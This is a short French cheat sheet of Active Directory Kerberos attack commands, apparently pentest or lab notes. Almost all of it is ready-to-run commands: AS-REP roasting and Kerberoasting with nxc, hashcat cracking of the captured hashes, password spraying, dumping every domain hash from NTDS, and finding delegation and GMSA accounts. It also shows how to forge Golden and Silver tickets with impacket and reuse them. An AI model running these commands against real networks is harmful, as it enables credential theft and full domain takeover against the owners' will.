Attaque Kerberos (AD)
Kerberoast, AS-REP, clock skew.
sommaire
AS-REP Roasting — nxc (comptes sans pré-auth)
nxc ldap 10.10.10.10 -u users.txt -p '' --asreproast asrep.txt # sans creds
nxc ldap 10.10.10.10 -u user -p pass --asreproast asrep.txt # avec un compte
hashcat -m 18200 asrep.txt rockyou.txt
Kerberoasting — nxc
nxc ldap 10.10.10.10 -u user -p pass --kerberoasting kerb.txt
nxc ldap 10.10.10.10 -u user -p pass --kerberoast-account svc_sql # cibler un compte
hashcat -m 13100 kerb.txt rockyou.txt
Password spraying — nxc
nxc smb 10.10.10.10 -u users.txt -p 'Printemps2024!' --continue-on-success
DCSync / dump NTDS — nxc (droits DA/admin requis)
nxc smb 10.10.10.10 -u administrateur -p pass --ntds # tous les hashes du domaine
nxc smb 10.10.10.10 -u administrateur -H <NThash> --ntds
nxc smb 10.10.10.10 -u administrateur -p pass --ntds --user krbtgt # seulement krbtgt
Délégations & GMSA — nxc ldap
nxc ldap 10.10.10.10 -u user -p pass --find-delegation
nxc ldap 10.10.10.10 -u user -p pass --trusted-for-delegation
nxc ldap 10.10.10.10 -u user -p pass --gmsa
Golden / Silver Ticket — forge (impacket requis, nxc ne forge pas)
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <SID> -domain domaine.local Administrator
export KRB5CCNAME=Administrator.ccache
nxc smb 10.10.10.10 -k --use-kcache # utiliser le ticket forge
# Silver : impacket-ticketer -nthash <service_hash> -domain-sid <SID> -domain dom -spn cifs/serveur user
Horloge (obligatoire)
sudo ntpdate 10.10.10.10